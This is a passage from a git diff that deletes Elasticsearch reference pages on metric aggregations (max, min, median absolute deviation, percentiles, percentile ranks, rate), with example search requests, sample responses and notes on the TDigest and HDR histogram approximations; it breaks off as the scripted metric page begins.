--------------------------------------------------- -POST /sales/_search -{ - "aggs" : { - "max_price" : { - "max" : { - "script" : { - "source" : "doc.price.value" - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -This will use the <> scripting language -and no script parameters. To use a stored script use the following syntax: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "aggs" : { - "max_price" : { - "max" : { - "script" : { - "id": "my_script", - "params": { - "field": "price" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales,stored_example_script] - -==== Value Script - -Let's say that the prices of the documents in our index are in USD, but we -would like to compute the max in EURO (and for the sake of this example, let's -say the conversion rate is 1.2). We can use a value script to apply the -conversion rate to every value before it is aggregated: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "aggs" : { - "max_price_in_euros" : { - "max" : { - "field" : "price", - "script" : { - "source" : "_value * params.conversion_rate", - "params" : { - "conversion_rate" : 1.2 - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -==== Missing value - -The `missing` parameter defines how documents that are missing a value should -be treated. By default they will be ignored but it is also possible to treat -them as if they had a value. - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "aggs" : { - "grade_max" : { - "max" : { - "field" : "grade", - "missing": 10 <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> Documents without a value in the `grade` field will fall into the same -bucket as documents that have the value `10`. - -[[search-aggregations-metrics-max-aggregation-histogram-fields]] -==== Histogram fields - -When `max` is computed on <>, the result of the aggregation is the maximum -of all elements in the `values` array. Note, that the `counts` array of the histogram is ignored. - -For example, for the following index that stores pre-aggregated histograms with latency metrics for different networks: - -[source,console] --------------------------------------------------- -PUT metrics_index/_doc/1 -{ - "network.name" : "net-1", - "latency_histo" : { - "values" : [0.1, 0.2, 0.3, 0.4, 0.5], <1> - "counts" : [3, 7, 23, 12, 6] <2> - } -} - -PUT metrics_index/_doc/2 -{ - "network.name" : "net-2", - "latency_histo" : { - "values" : [0.1, 0.2, 0.3, 0.4, 0.5], <1> - "counts" : [8, 17, 8, 7, 6] <2> - } -} - -POST /metrics_index/_search?size=0 -{ - "aggs" : { - "min_latency" : { "min" : { "field" : "latency_histo" } } - } -} --------------------------------------------------- - -The `max` aggregation will return the maximum value of all histogram fields: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "min_latency": { - "value": 0.5 - } - } -} --------------------------------------------------- -// TESTRESPONSE[skip:test not setup] diff --git a/docs/reference/aggregations/metrics/median-absolute-deviation-aggregation.asciidoc b/docs/reference/aggregations/metrics/median-absolute-deviation-aggregation.asciidoc deleted file mode 100644 index 21811542073..00000000000 --- a/docs/reference/aggregations/metrics/median-absolute-deviation-aggregation.asciidoc +++ /dev/null @@ -1,187 +0,0 @@ -[[search-aggregations-metrics-median-absolute-deviation-aggregation]] -=== Median absolute deviation aggregation -++++ -Median absolute deviation -++++ - -This `single-value` aggregation approximates the {wikipedia}/Median_absolute_deviation[median absolute deviation] -of its search results. - -Median absolute deviation is a measure of variability. It is a robust -statistic, meaning that it is useful for describing data that may have -outliers, or may not be normally distributed. For such data it can be more -descriptive than standard deviation. - -It is calculated as the median of each data point's deviation from the median -of the entire sample. That is, for a random variable X, the median absolute -deviation is median(|median(X) - X~i~|). - -==== Example - -Assume our data represents product reviews on a one to five star scale. -Such reviews are usually summarized as a mean, which is easily understandable -but doesn't describe the reviews' variability. Estimating the median absolute -deviation can provide insight into how much reviews vary from one another. - -In this example we have a product which has an average rating of -3 stars. Let's look at its ratings' median absolute deviation to determine -how much they vary - -[source,console] ---------------------------------------------------------- -GET reviews/_search -{ - "size": 0, - "aggs": { - "review_average": { - "avg": { - "field": "rating" - } - }, - "review_variability": { - "median_absolute_deviation": { - "field": "rating" <1> - } - } - } -} ---------------------------------------------------------- -// TEST[setup:reviews] -<1> `rating` must be a numeric field - -The resulting median absolute deviation of `2` tells us that there is a fair -amount of variability in the ratings. Reviewers must have diverse opinions about -this product. - -[source,console-result] ---------------------------------------------------------- -{ - ... - "aggregations": { - "review_average": { - "value": 3.0 - }, - "review_variability": { - "value": 2.0 - } - } -} ---------------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -==== Approximation - -The naive implementation of calculating median absolute deviation stores the -entire sample in memory, so this aggregation instead calculates an -approximation. It uses the https://github.com/tdunning/t-digest[TDigest data structure] -to approximate the sample median and the median of deviations from the sample -median. For more about the approximation characteristics of TDigests, see -<>. - -The tradeoff between resource usage and accuracy of a TDigest's quantile -approximation, and therefore the accuracy of this aggregation's approximation -of median absolute deviation, is controlled by the `compression` parameter. A -higher `compression` setting provides a more accurate approximation at the -cost of higher memory usage. For more about the characteristics of the TDigest -`compression` parameter see -<>. - -[source,console] ---------------------------------------------------------- -GET reviews/_search -{ - "size": 0, - "aggs": { - "review_variability": { - "median_absolute_deviation": { - "field": "rating", - "compression": 100 - } - } - } -} ---------------------------------------------------------- -// TEST[setup:reviews] - -The default `compression` value for this aggregation is `1000`. At this -compression level this aggregation is usually within 5% of the exact result, -but observed performance will depend on the sample data. - -==== Script - -This metric aggregation supports scripting. In our example above, product -reviews are on a scale of one to five. If we wanted to modify them to a scale -of one to ten, we can using scripting. - -To provide an inline script: - -[source,console] ---------------------------------------------------------- -GET reviews/_search -{ - "size": 0, - "aggs": { - "review_variability": { - "median_absolute_deviation": { - "script": { - "lang": "painless", - "source": "doc['rating'].value * params.scaleFactor", - "params": { - "scaleFactor": 2 - } - } - } - } - } -} ---------------------------------------------------------- -// TEST[setup:reviews] - -To provide a stored script: - -[source,console] ---------------------------------------------------------- -GET reviews/_search -{ - "size": 0, - "aggs": { - "review_variability": { - "median_absolute_deviation": { - "script": { - "id": "my_script", - "params": { - "field": "rating" - } - } - } - } - } -} ---------------------------------------------------------- -// TEST[setup:reviews,stored_example_script] - -==== Missing value - -The `missing` parameter defines how documents that are missing a value should be -treated. By default they will be ignored but it is also possible to treat them -as if they had a value. - -Let's be optimistic and assume some reviewers loved the product so much that -they forgot to give it a rating. We'll assign them five stars - -[source,console] ---------------------------------------------------------- -GET reviews/_search -{ - "size": 0, - "aggs": { - "review_variability": { - "median_absolute_deviation": { - "field": "rating", - "missing": 5 - } - } - } -} ---------------------------------------------------------- -// TEST[setup:reviews] diff --git a/docs/reference/aggregations/metrics/min-aggregation.asciidoc b/docs/reference/aggregations/metrics/min-aggregation.asciidoc deleted file mode 100644 index d6614e4fd48..00000000000 --- a/docs/reference/aggregations/metrics/min-aggregation.asciidoc +++ /dev/null @@ -1,196 +0,0 @@ -[[search-aggregations-metrics-min-aggregation]] -=== Min aggregation -++++ -Min -++++ - -A `single-value` metrics aggregation that keeps track and returns the minimum -value among numeric values extracted from the aggregated documents. These -values can be extracted either from specific numeric fields in the documents, -or be generated by a provided script. - -NOTE: The `min` and `max` aggregation operate on the `double` representation of -the data. As a consequence, the result may be approximate when running on longs -whose absolute value is greater than +2^53+. - -Computing the min price value across all documents: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "min_price": { "min": { "field": "price" } } - } -} --------------------------------------------------- -// TEST[setup:sales] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - - "aggregations": { - "min_price": { - "value": 10.0 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -As can be seen, the name of the aggregation (`min_price` above) also serves as -the key by which the aggregation result can be retrieved from the returned -response. - -==== Script - -The `min` aggregation can also calculate the minimum of a script. The example -below computes the minimum price: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "aggs": { - "min_price": { - "min": { - "script": { - "source": "doc.price.value" - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -This will use the <> scripting language -and no script parameters. To use a stored script use the following syntax: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "aggs": { - "min_price": { - "min": { - "script": { - "id": "my_script", - "params": { - "field": "price" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales,stored_example_script] - -==== Value Script - -Let's say that the prices of the documents in our index are in USD, but we -would like to compute the min in EURO (and for the sake of this example, let's -say the conversion rate is 1.2). We can use a value script to apply the -conversion rate to every value before it is aggregated: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "aggs": { - "min_price_in_euros": { - "min": { - "field": "price", - "script": { - "source": "_value * params.conversion_rate", - "params": { - "conversion_rate": 1.2 - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -==== Missing value - -The `missing` parameter defines how documents that are missing a value should -be treated. By default they will be ignored but it is also possible to treat -them as if they had a value. - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "aggs": { - "grade_min": { - "min": { - "field": "grade", - "missing": 10 <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> Documents without a value in the `grade` field will fall into the same -bucket as documents that have the value `10`. - -[[search-aggregations-metrics-min-aggregation-histogram-fields]] -==== Histogram fields - -When `min` is computed on <>, the result of the aggregation is the minimum -of all elements in the `values` array. Note, that the `counts` array of the histogram is ignored. - -For example, for the following index that stores pre-aggregated histograms with latency metrics for different networks: - -[source,console] --------------------------------------------------- -PUT metrics_index/_doc/1 -{ - "network.name" : "net-1", - "latency_histo" : { - "values" : [0.1, 0.2, 0.3, 0.4, 0.5], <1> - "counts" : [3, 7, 23, 12, 6] <2> - } -} - -PUT metrics_index/_doc/2 -{ - "network.name" : "net-2", - "latency_histo" : { - "values" : [0.1, 0.2, 0.3, 0.4, 0.5], <1> - "counts" : [8, 17, 8, 7, 6] <2> - } -} - -POST /metrics_index/_search?size=0 -{ - "aggs" : { - "min_latency" : { "min" : { "field" : "latency_histo" } } - } -} --------------------------------------------------- - -The `min` aggregation will return the minimum value of all histogram fields: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "min_latency": { - "value": 0.1 - } - } -} --------------------------------------------------- -// TESTRESPONSE[skip:test not setup] diff --git a/docs/reference/aggregations/metrics/percentile-aggregation.asciidoc b/docs/reference/aggregations/metrics/percentile-aggregation.asciidoc deleted file mode 100644 index 460d7c05906..00000000000 --- a/docs/reference/aggregations/metrics/percentile-aggregation.asciidoc +++ /dev/null @@ -1,371 +0,0 @@ -[[search-aggregations-metrics-percentile-aggregation]] -=== Percentiles aggregation -++++ -Percentiles -++++ - -A `multi-value` metrics aggregation that calculates one or more percentiles -over numeric values extracted from the aggregated documents. These values can be -generated by a provided script or extracted from specific numeric or -<> in the documents. - -Percentiles show the point at which a certain percentage of observed values -occur. For example, the 95th percentile is the value which is greater than 95% -of the observed values. - -Percentiles are often used to find outliers. In normal distributions, the -0.13th and 99.87th percentiles represents three standard deviations from the -mean. Any data which falls outside three standard deviations is often considered -an anomaly. - -When a range of percentiles are retrieved, they can be used to estimate the -data distribution and determine if the data is skewed, bimodal, etc. - -Assume your data consists of website load times. The average and median -load times are not overly useful to an administrator. The max may be interesting, -but it can be easily skewed by a single slow response. - -Let's look at a range of percentiles representing load time: - -[source,console] --------------------------------------------------- -GET latency/_search -{ - "size": 0, - "aggs": { - "load_time_outlier": { - "percentiles": { - "field": "load_time" <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:latency] -<1> The field `load_time` must be a numeric field - -By default, the `percentile` metric will generate a range of -percentiles: `[ 1, 5, 25, 50, 75, 95, 99 ]`. The response will look like this: - -[source,console-result] --------------------------------------------------- -{ - ... - - "aggregations": { - "load_time_outlier": { - "values": { - "1.0": 5.0, - "5.0": 25.0, - "25.0": 165.0, - "50.0": 445.0, - "75.0": 725.0, - "95.0": 945.0, - "99.0": 985.0 - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -As you can see, the aggregation will return a calculated value for each percentile -in the default range. If we assume response times are in milliseconds, it is -immediately obvious that the webpage normally loads in 10-725ms, but occasionally -spikes to 945-985ms. - -Often, administrators are only interested in outliers -- the extreme percentiles. -We can specify just the percents we are interested in (requested percentiles -must be a value between 0-100 inclusive): - -[source,console] --------------------------------------------------- -GET latency/_search -{ - "size": 0, - "aggs": { - "load_time_outlier": { - "percentiles": { - "field": "load_time", - "percents": [ 95, 99, 99.9 ] <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:latency] -<1> Use the `percents` parameter to specify particular percentiles to calculate - -==== Keyed Response - -By default the `keyed` flag is set to `true` which associates a unique string key with each bucket and returns the ranges as a hash rather than an array. Setting the `keyed` flag to `false` will disable this behavior: - -[source,console] --------------------------------------------------- -GET latency/_search -{ - "size": 0, - "aggs": { - "load_time_outlier": { - "percentiles": { - "field": "load_time", - "keyed": false - } - } - } -} --------------------------------------------------- -// TEST[setup:latency] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - - "aggregations": { - "load_time_outlier": { - "values": [ - { - "key": 1.0, - "value": 5.0 - }, - { - "key": 5.0, - "value": 25.0 - }, - { - "key": 25.0, - "value": 165.0 - }, - { - "key": 50.0, - "value": 445.0 - }, - { - "key": 75.0, - "value": 725.0 - }, - { - "key": 95.0, - "value": 945.0 - }, - { - "key": 99.0, - "value": 985.0 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -==== Script - -The percentile metric supports scripting. For example, if our load times -are in milliseconds but we want percentiles calculated in seconds, we could use -a script to convert them on-the-fly: - -[source,console] --------------------------------------------------- -GET latency/_search -{ - "size": 0, - "aggs": { - "load_time_outlier": { - "percentiles": { - "script": { - "lang": "painless", - "source": "doc['load_time'].value / params.timeUnit", <1> - "params": { - "timeUnit": 1000 <2> - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:latency] - -<1> The `field` parameter is replaced with a `script` parameter, which uses the -script to generate values which percentiles are calculated on -<2> Scripting supports parameterized input just like any other script - -This will interpret the `script` parameter as an `inline` script with the `painless` script language and no script parameters. To use a stored script use the following syntax: - -[source,console] --------------------------------------------------- -GET latency/_search -{ - "size": 0, - "aggs": { - "load_time_outlier": { - "percentiles": { - "script": { - "id": "my_script", - "params": { - "field": "load_time" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:latency,stored_example_script] - -[[search-aggregations-metrics-percentile-aggregation-approximation]] -==== Percentiles are (usually) approximate - -There are many different algorithms to calculate percentiles. The naive -implementation simply stores all the values in a sorted array. To find the 50th -percentile, you simply find the value that is at `my_array[count(my_array) * 0.5]`. - -Clearly, the naive implementation does not scale -- the sorted array grows -linearly with the number of values in your dataset. To calculate percentiles -across potentially billions of values in an Elasticsearch cluster, _approximate_ -percentiles are calculated. - -The algorithm used by the `percentile` metric is called TDigest (introduced by -Ted Dunning in -https://github.com/tdunning/t-digest/blob/master/docs/t-digest-paper/histo.pdf[Computing Accurate Quantiles using T-Digests]). - -When using this metric, there are a few guidelines to keep in mind: - -- Accuracy is proportional to `q(1-q)`. This means that extreme percentiles (e.g. 99%) -are more accurate than less extreme percentiles, such as the median -- For small sets of values, percentiles are highly accurate (and potentially -100% accurate if the data is small enough). -- As the quantity of values in a bucket grows, the algorithm begins to approximate -the percentiles. It is effectively trading accuracy for memory savings. The -exact level of inaccuracy is difficult to generalize, since it depends on your -data distribution and volume of data being aggregated - -The following chart shows the relative error on a uniform distribution depending -on the number of collected values and the requested percentile: - -image:images/percentiles_error.png[] - -It shows how precision is better for extreme percentiles. The reason why error diminishes -for large number of values is that the law of large numbers makes the distribution of -values more and more uniform and the t-digest tree can do a better job at summarizing -it. It would not be the case on more skewed distributions. - -[WARNING] -==== -Percentile aggregations are also -{wikipedia}/Nondeterministic_algorithm[non-deterministic]. -This means you can get slightly different results using the same data. -==== - -[[search-aggregations-metrics-percentile-aggregation-compression]] -==== Compression - -Approximate algorithms must balance memory utilization with estimation accuracy. -This balance can be controlled using a `compression` parameter: - -[source,console] --------------------------------------------------- -GET latency/_search -{ - "size": 0, - "aggs": { - "load_time_outlier": { - "percentiles": { - "field": "load_time", - "tdigest": { - "compression": 200 <1> - } - } - } - } -} --------------------------------------------------- -// TEST[setup:latency] - -<1> Compression controls memory usage and approximation error - -// tag::t-digest[] -The TDigest algorithm uses a number of "nodes" to approximate percentiles -- the -more nodes available, the higher the accuracy (and large memory footprint) proportional -to the volume of data. The `compression` parameter limits the maximum number of -nodes to `20 * compression`. - -Therefore, by increasing the compression value, you can increase the accuracy of -your percentiles at the cost of more memory. Larger compression values also -make the algorithm slower since the underlying tree data structure grows in size, -resulting in more expensive operations. The default compression value is -`100`. - -A "node" uses roughly 32 bytes of memory, so under worst-case scenarios (large amount -of data which arrives sorted and in-order) the default settings will produce a -TDigest roughly 64KB in size. In practice data tends to be more random and -the TDigest will use less memory. -// end::t-digest[] - -==== HDR Histogram - -NOTE: This setting exposes the internal implementation of HDR Histogram and the syntax may change in the future. - -https://github.com/HdrHistogram/HdrHistogram[HDR Histogram] (High Dynamic Range Histogram) is an alternative implementation -that can be useful when calculating percentiles for latency measurements as it can be faster than the t-digest implementation -with the trade-off of a larger memory footprint. This implementation maintains a fixed worse-case percentage error (specified -as a number of significant digits). This means that if data is recorded with values from 1 microsecond up to 1 hour -(3,600,000,000 microseconds) in a histogram set to 3 significant digits, it will maintain a value resolution of 1 microsecond -for values up to 1 millisecond and 3.6 seconds (or better) for the maximum tracked value (1 hour). - -The HDR Histogram can be used by specifying the `method` parameter in the request: - -[source,console] --------------------------------------------------- -GET latency/_search -{ - "size": 0, - "aggs": { - "load_time_outlier": { - "percentiles": { - "field": "load_time", - "percents": [ 95, 99, 99.9 ], - "hdr": { <1> - "number_of_significant_value_digits": 3 <2> - } - } - } - } -} --------------------------------------------------- -// TEST[setup:latency] - -<1> `hdr` object indicates that HDR Histogram should be used to calculate the percentiles and specific settings for this algorithm can be specified inside the object -<2> `number_of_significant_value_digits` specifies the resolution of values for the histogram in number of significant digits - -The HDRHistogram only supports positive values and will error if it is passed a negative value. It is also not a good idea to use -the HDRHistogram if the range of values is unknown as this could lead to high memory usage. - -==== Missing value - -The `missing` parameter defines how documents that are missing a value should be treated. -By default they will be ignored but it is also possible to treat them as if they -had a value. - -[source,console] --------------------------------------------------- -GET latency/_search -{ - "size": 0, - "aggs": { - "grade_percentiles": { - "percentiles": { - "field": "grade", - "missing": 10 <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:latency] - -<1> Documents without a value in the `grade` field will fall into the same bucket as documents that have the value `10`. diff --git a/docs/reference/aggregations/metrics/percentile-rank-aggregation.asciidoc b/docs/reference/aggregations/metrics/percentile-rank-aggregation.asciidoc deleted file mode 100644 index 6a76226fde3..00000000000 --- a/docs/reference/aggregations/metrics/percentile-rank-aggregation.asciidoc +++ /dev/null @@ -1,241 +0,0 @@ -[[search-aggregations-metrics-percentile-rank-aggregation]] -=== Percentile ranks aggregation -++++ -Percentile ranks -++++ - -A `multi-value` metrics aggregation that calculates one or more percentile ranks -over numeric values extracted from the aggregated documents. These values can be -generated by a provided script or extracted from specific numeric or -<> in the documents. - -[NOTE] -================================================== -Please see <> -and <> for advice -regarding approximation and memory use of the percentile ranks aggregation -================================================== - -Percentile rank show the percentage of observed values which are below certain -value. For example, if a value is greater than or equal to 95% of the observed values -it is said to be at the 95th percentile rank. - -Assume your data consists of website load times. You may have a service agreement that -95% of page loads complete within 500ms and 99% of page loads complete within 600ms. - -Let's look at a range of percentiles representing load time: - -[source,console] --------------------------------------------------- -GET latency/_search -{ - "size": 0, - "aggs": { - "load_time_ranks": { - "percentile_ranks": { - "field": "load_time", <1> - "values": [ 500, 600 ] - } - } - } -} --------------------------------------------------- -// TEST[setup:latency] - -<1> The field `load_time` must be a numeric field - -The response will look like this: - -[source,console-result] --------------------------------------------------- -{ - ... - - "aggregations": { - "load_time_ranks": { - "values": { - "500.0": 90.01, - "600.0": 100.0 - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] -// TESTRESPONSE[s/"500.0": 90.01/"500.0": 55.00000000000001/] -// TESTRESPONSE[s/"600.0": 100.0/"600.0": 64.0/] - -From this information you can determine you are hitting the 99% load time target but not quite -hitting the 95% load time target - -==== Keyed Response - -By default the `keyed` flag is set to `true` associates a unique string key with each bucket and returns the ranges as a hash rather than an array. Setting the `keyed` flag to `false` will disable this behavior: - -[source,console] --------------------------------------------------- -GET latency/_search -{ - "size": 0, - "aggs": { - "load_time_ranks": { - "percentile_ranks": { - "field": "load_time", - "values": [ 500, 600 ], - "keyed": false - } - } - } -} --------------------------------------------------- -// TEST[setup:latency] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - - "aggregations": { - "load_time_ranks": { - "values": [ - { - "key": 500.0, - "value": 90.01 - }, - { - "key": 600.0, - "value": 100.0 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] -// TESTRESPONSE[s/"value": 90.01/"value": 55.00000000000001/] -// TESTRESPONSE[s/"value": 100.0/"value": 64.0/] - - -==== Script - -The percentile rank metric supports scripting. For example, if our load times -are in milliseconds but we want to specify values in seconds, we could use -a script to convert them on-the-fly: - -[source,console] --------------------------------------------------- -GET latency/_search -{ - "size": 0, - "aggs": { - "load_time_ranks": { - "percentile_ranks": { - "values": [ 500, 600 ], - "script": { - "lang": "painless", - "source": "doc['load_time'].value / params.timeUnit", <1> - "params": { - "timeUnit": 1000 <2> - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:latency] - -<1> The `field` parameter is replaced with a `script` parameter, which uses the -script to generate values which percentile ranks are calculated on -<2> Scripting supports parameterized input just like any other script - -This will interpret the `script` parameter as an `inline` script with the `painless` script language and no script parameters. To use a stored script use the following syntax: - -[source,console] --------------------------------------------------- -GET latency/_search -{ - "size": 0, - "aggs": { - "load_time_ranks": { - "percentile_ranks": { - "values": [ 500, 600 ], - "script": { - "id": "my_script", - "params": { - "field": "load_time" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:latency,stored_example_script] - -==== HDR Histogram - -NOTE: This setting exposes the internal implementation of HDR Histogram and the syntax may change in the future. - -https://github.com/HdrHistogram/HdrHistogram[HDR Histogram] (High Dynamic Range Histogram) is an alternative implementation -that can be useful when calculating percentile ranks for latency measurements as it can be faster than the t-digest implementation -with the trade-off of a larger memory footprint. This implementation maintains a fixed worse-case percentage error (specified as a -number of significant digits). This means that if data is recorded with values from 1 microsecond up to 1 hour (3,600,000,000 -microseconds) in a histogram set to 3 significant digits, it will maintain a value resolution of 1 microsecond for values up to -1 millisecond and 3.6 seconds (or better) for the maximum tracked value (1 hour). - -The HDR Histogram can be used by specifying the `hdr` object in the request: - -[source,console] --------------------------------------------------- -GET latency/_search -{ - "size": 0, - "aggs": { - "load_time_ranks": { - "percentile_ranks": { - "field": "load_time", - "values": [ 500, 600 ], - "hdr": { <1> - "number_of_significant_value_digits": 3 <2> - } - } - } - } -} --------------------------------------------------- -// TEST[setup:latency] - -<1> `hdr` object indicates that HDR Histogram should be used to calculate the percentiles and specific settings for this algorithm can be specified inside the object -<2> `number_of_significant_value_digits` specifies the resolution of values for the histogram in number of significant digits - -The HDRHistogram only supports positive values and will error if it is passed a negative value. It is also not a good idea to use -the HDRHistogram if the range of values is unknown as this could lead to high memory usage. - -==== Missing value - -The `missing` parameter defines how documents that are missing a value should be treated. -By default they will be ignored but it is also possible to treat them as if they -had a value. - -[source,console] --------------------------------------------------- -GET latency/_search -{ - "size": 0, - "aggs": { - "load_time_ranks": { - "percentile_ranks": { - "field": "load_time", - "values": [ 500, 600 ], - "missing": 10 <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:latency] - -<1> Documents without a value in the `load_time` field will fall into the same bucket as documents that have the value `10`. diff --git a/docs/reference/aggregations/metrics/rate-aggregation.asciidoc b/docs/reference/aggregations/metrics/rate-aggregation.asciidoc deleted file mode 100644 index 48d9a26bbdc..00000000000 --- a/docs/reference/aggregations/metrics/rate-aggregation.asciidoc +++ /dev/null @@ -1,260 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[search-aggregations-metrics-rate-aggregation]] -=== Rate aggregation -++++ -Rate -++++ - -A `rate` metrics aggregation can be used only inside a `date_histogram` and calculates a rate of documents or a field in each -`date_histogram` bucket. - -==== Syntax - -A `rate` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "rate": { - "unit": "month", - "field": "requests" - } -} --------------------------------------------------- -// NOTCONSOLE - -The following request will group all sales records into monthly bucket and than convert the number of sales transaction in each bucket -into per annual sales rate. - -[source,console] --------------------------------------------------- -GET sales/_search -{ - "size": 0, - "aggs": { - "by_date": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" <1> - }, - "aggs": { - "my_rate": { - "rate": { - "unit": "year" <2> - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] -<1> Histogram is grouped by month. -<2> But the rate is converted into annual rate. - -The response will return the annual rate of transaction in each bucket. Since there are 12 months per year, the annual rate will -be automatically calculated by multiplying monthly rate by 12. - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations" : { - "by_date" : { - "buckets" : [ - { - "key_as_string" : "2015/01/01 00:00:00", - "key" : 1420070400000, - "doc_count" : 3, - "my_rate" : { - "value" : 36.0 - } - }, - { - "key_as_string" : "2015/02/01 00:00:00", - "key" : 1422748800000, - "doc_count" : 2, - "my_rate" : { - "value" : 24.0 - } - }, - { - "key_as_string" : "2015/03/01 00:00:00", - "key" : 1425168000000, - "doc_count" : 2, - "my_rate" : { - "value" : 24.0 - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -Instead of counting the number of documents, it is also possible to calculate a sum of all values of the fields in the documents in each -bucket. The following request will group all sales records into monthly bucket and than calculate the total monthly sales and convert them -into average daily sales. - -[source,console] --------------------------------------------------- -GET sales/_search -{ - "size": 0, - "aggs": { - "by_date": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" <1> - }, - "aggs": { - "avg_price": { - "rate": { - "field": "price", <2> - "unit": "day" <3> - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] -<1> Histogram is grouped by month. -<2> Calculate sum of all sale prices -<3> Convert to average daily sales - -The response will contain the average daily sale prices for each month. - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations" : { - "by_date" : { - "buckets" : [ - { - "key_as_string" : "2015/01/01 00:00:00", - "key" : 1420070400000, - "doc_count" : 3, - "avg_price" : { - "value" : 17.741935483870968 - } - }, - { - "key_as_string" : "2015/02/01 00:00:00", - "key" : 1422748800000, - "doc_count" : 2, - "avg_price" : { - "value" : 2.142857142857143 - } - }, - { - "key_as_string" : "2015/03/01 00:00:00", - "key" : 1425168000000, - "doc_count" : 2, - "avg_price" : { - "value" : 12.096774193548388 - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - - -==== Relationship between bucket sizes and rate - -The `rate` aggregation supports all rate that can be used <> of `date_histogram` -aggregation. The specified rate should compatible with the `date_histogram` aggregation interval, i.e. it should be possible to -convert the bucket size into the rate. By default the interval of the `date_histogram` is used. - -`"rate": "second"`:: compatible with all intervals -`"rate": "minute"`:: compatible with all intervals -`"rate": "hour"`:: compatible with all intervals -`"rate": "day"`:: compatible with all intervals -`"rate": "week"`:: compatible with all intervals -`"rate": "month"`:: compatible with only with `month`, `quarter` and `year` calendar intervals -`"rate": "quarter"`:: compatible with only with `month`, `quarter` and `year` calendar intervals -`"rate": "year"`:: compatible with only with `month`, `quarter` and `year` calendar intervals - -==== Script - -The `rate` aggregation also supports scripting. For example, if we need to adjust out prices before calculating rates, we could use -a script to recalculate them on-the-fly: - -[source,console] --------------------------------------------------- -GET sales/_search -{ - "size": 0, - "aggs": { - "by_date": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" - }, - "aggs": { - "avg_price": { - "rate": { - "script": { <1> - "lang": "painless", - "source": "doc['price'].value * params.adjustment", - "params": { - "adjustment": 0.9 <2> - } - } - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> The `field` parameter is replaced with a `script` parameter, which uses the -script to generate values which percentiles are calculated on. -<2> Scripting supports parameterized input just like any other script. - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations" : { - "by_date" : { - "buckets" : [ - { - "key_as_string" : "2015/01/01 00:00:00", - "key" : 1420070400000, - "doc_count" : 3, - "avg_price" : { - "value" : 495.0 - } - }, - { - "key_as_string" : "2015/02/01 00:00:00", - "key" : 1422748800000, - "doc_count" : 2, - "avg_price" : { - "value" : 54.0 - } - }, - { - "key_as_string" : "2015/03/01 00:00:00", - "key" : 1425168000000, - "doc_count" : 2, - "avg_price" : { - "value" : 337.5 - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] diff --git a/docs/reference/aggregations/metrics/scripted-metric-aggregation.asciidoc b/docs/reference/aggregations/metrics/scripted-metric-aggregation.asciidoc deleted file mode 100644 index 2bedcd4698b..00000000000 --- a/docs/reference/aggregations/metrics/scripted-metric-aggregation.asciidoc +++ /dev/null @@ -1,286 +0,0 @@ -[[search-aggregations-metrics-scripted-metric-aggregation]] -=== Scripted metric aggregation -++++ -Scripted metric -++++ - -A metric aggregation that executes using scripts to provide a metric output. - -WARNING: Using scripts can result in slower search speeds. See -<>. - -Example: - -[source,console] --------------------------------------------------- -POST ledger/_search?size=0 -{ - 